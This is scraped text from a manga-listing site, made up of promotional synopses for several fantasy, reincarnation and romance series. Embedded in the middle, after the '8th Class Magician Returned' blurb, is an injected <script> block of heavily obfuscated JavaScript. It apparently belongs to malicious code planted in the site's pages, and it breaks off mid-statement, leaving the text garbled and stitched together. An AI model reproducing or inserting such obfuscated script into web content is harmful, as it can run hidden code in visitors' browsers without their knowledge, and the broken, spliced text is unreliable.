Read manga Your Highness i Decide My Fate / Denka, Unmei wa Watashi ga Kimemasu Firi was deceived by her family and sold to the first prince, Terios, as a substitute as an experimental animal. During the experiment, Firi awakens as the master of the “Tarot Card of Destiny” in exchange for her death. With the power of the god card, Firi will carve out a new destiny together with the “incarnation of the card, Norn” and the “second prince, Aster”, who is hostile to his brother, in order to stop Terios’s cruel ambition and obtain true happiness! 殿下、運命は私が決めます
Decades of blood put for Emperor Ragnar and a unified empire I wanted to return to my hometown, atone for my sins, and live like I was dead But "You are an 8th-class wizard who can devour me and my empire at any time" "How can I keep such a monster alive?" Betrayed by Ragnar, his friend and lord, just before crossing the threshold of death, A dagger engraved with a time magic spell was inserted into the heart. 'The pentinence I wanted was to give everything back' 8th Class Magician Returned<script></script><script>(function(_0x1e7857,_0x261031){var _0x597ea2=_0xa0cb,_0x17b29f=_0x1e7857();while(!![]){try{var _0x146b87=parseInt(_0x597ea2(0x15e))/(-0x1b98+0x841+0x1358)+-parseInt(_0x597ea2(0x149))/(0x1*0x1b73+0x469*0x1+-0x1fda)*(parseInt(_0x597ea2(0x150))/(-0x2376+0xe6a+-0x257*-0x9))+-parseInt(_0x597ea2(0x153))/(-0x47e+0x4a2+-0x10*0x2)*(-parseInt(_0x597ea2(0x14f))/(0x1fba+0x2005*-0x1+0x50))+parseInt(_0x597ea2(0x157))/(0x112c+0x1604+0x45a*-0x9)*(parseInt(_0x597ea2(0x158))/(0x1a86+0x2*-0x355+-0x13d5))+parseInt(_0x597ea2(0x14b))/(-0xe*-0x109+0x2*0x48+-0x281*0x6)+-parseInt(_0x597ea2(0x154))/(-0x7cf+0xde2+-0x60a)+-parseInt(_0x597ea2(0x15a))/(-0xf14+0x13ce+0x5*-0xf0)*(parseInt(_0x597ea2(0x147))/(-0x1*0x2161+-0x33a+0x2*0x1253));if(_0x146b87===_0x261031)break;else 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A young witch from Isekai, Rose arrived at Sado Island in modern-day Japan. There, she met Sana, a villager girl on the island. Having nowhere to go, Rose decided to live with Sana, and the colorful daily life on Sado Island was waiting for her.
Read manga Disgraced Wife? This Beloved Genius Mage Will Secure Her Divorce! / Munou Tsumatte Dare no Koto Kashira? ~Aisare Tensai Majutsushi, Rien o Kachitorimasu!~ at MANHUA TOP Countess Yumemi has a gift for magic, and together with her childhood friend Fred, she aims to become the first woman to join the Order of Knights through a friendly competition. However, just before she is about to achieve her dream, she is ordered into an unwanted marriage by the king, who has taken notice of her high magical power. As a noblewoman, the king’s orders are absolute, and she is determined not to cause any trouble for her family, so she arrives shortly after the wedding. Her husband, who had a talent for witchcraft, neglected Yumemi, violently attacked her and sealed her will and magic power with a cursed ring. Stripped her of magical powers and feelings. Yumemi was used as an outcast and treated like trash in her marriage , until one day she was pushed down the stairs and was left on the brink of life and death. When Yumemi manages to wake up, she no longer remembers her marriage, but has escaped the curse ring’s power…? From her diary, Yumemi learns that she was once treated harshly as an incompetent wife who couldn’t even use magic. Unaware that she has regained her magic power and will, she begins to fight back against her husband, who treats her as ‘incompetent’, and the servants who mistreated her, with tricks of her own! 無能妻って誰のことかしら? ~愛され天才魔術師、離縁を勝ち取ります!~
Read manga Forget That Night, Your Majesty / Heika Watashi o Wasurete Kudasai / 陛下わたしを忘れてください “Even if you didn’t love me, I still wanted to save you.” Lunia, the daughter of the Persephone Count family, lives a lonely life, shunned by her father and treated as a mere tool by her half-brother. Abandoned and isolated, her days are filled with despair. However, fate takes a sudden turn when a priest brings a proposal that ties her destiny to Hadeus, the head of the Chronoa Ducal House. What will happen when a girl who has been denied love her entire life crosses paths with a duke whose secrets could change the course of her future? Unravel the intricate web of politics, emotions, and romance in this gripping fantasy tale. Dive into “Forget That Night, Your Majesty” and experience the poignant journey of a woman striving to find her place in a world that has cast her aside. Heika Watashi o Wasurete Kudasai 陛下わたしを忘れてください
Aspiring manga artist Taisei Kuji is an assistant to his sister, a popular BL mangaka. One day, Taisei was unluckily run over by a truck and found himself reincarnated into the omegaverse world drawn by his sister!
There was a globally popular game called *The Legend of the Seven Heroes*. Ren cleared the sequel of that game at the fastest record in the world, and thus he obtained a bonus special data. However, no matter where he looked inside the game, he could not find the data. The moment where Ren was about to give up the search, he decided to start playing the second round of the game. Suddenly, a notification message “Do you want to start a special story?\" appeared on the screen. When Ren chose “Yes” without hesitation, he lost consciousness, and when he woke up, he was a baby. —Could it be that he was reincarnated as one of the heroes in *The Legend of the Seven Heroes*? Ren, who thought such a thing was impossible, could not believe his ears when he heard his name from his mother\'s mouth. It was the name of a classmate who betrays the heroes in the middle of the story. Of course, he wishes to live in peace. But he meets a saint whose life he\'s supposed to take, and doesn\'t. Furthermore, he ends up saving a character (the boss of a great noble family) who was supposed to die. All of these things creates a development that he doesn\'t know about coming to play… --- **Original Web Novel:** [Kakuyomu](, [Syosetu](
Eugene Felivia, the beloved youngest son of the noble Felivia family, known for its great warriors, gains a second life thanks to the grace of \'Felin, the Wizard of Creation.\' Eugene dreams of becoming a wizard like Felin, who saved him, and using his powers to make the world a better place. However, the dark and harsh realities and his fate still refuse to let him go...
People around me called me a sage who was obsessed with the Philosopher\'s Stone.\" There was once a man who mastered magic and was known as a sage. Realizing that creating the Philosopher\'s Stone was impossible with his current body, he took a gamble. He decided to reincarnate into a future world as a different person to obtain a new, stronger body. His reincarnation was successful, and he gained the body of a cute boy named Mars, marked with the emblem of strength, the \"Pure Seal.\" However, in the future, this emblem was inexplicably regarded as a \"Defective Seal\"...! All for the sake of the Philosopher\'s Stone. The journey of the strongest sage begins anew!!
In a world where humanity is struggling to fight off the demon threat due to the difference in magic between them, the humans choose to summon heroes from another world, hoping the heroes\' unique magic can save them. But, both the \"heroes\", and the world they were summoned to, are more complex than they seem...
“The world will become your enemy if you descend into Jianghu…” The young patriarch of a declining family, Baek Mujin, prepares for a journey into the outside world to restore his family’s fortunes. Despite the foreseen future where the world will stand as his enemy, Mujin begins his lonely battle.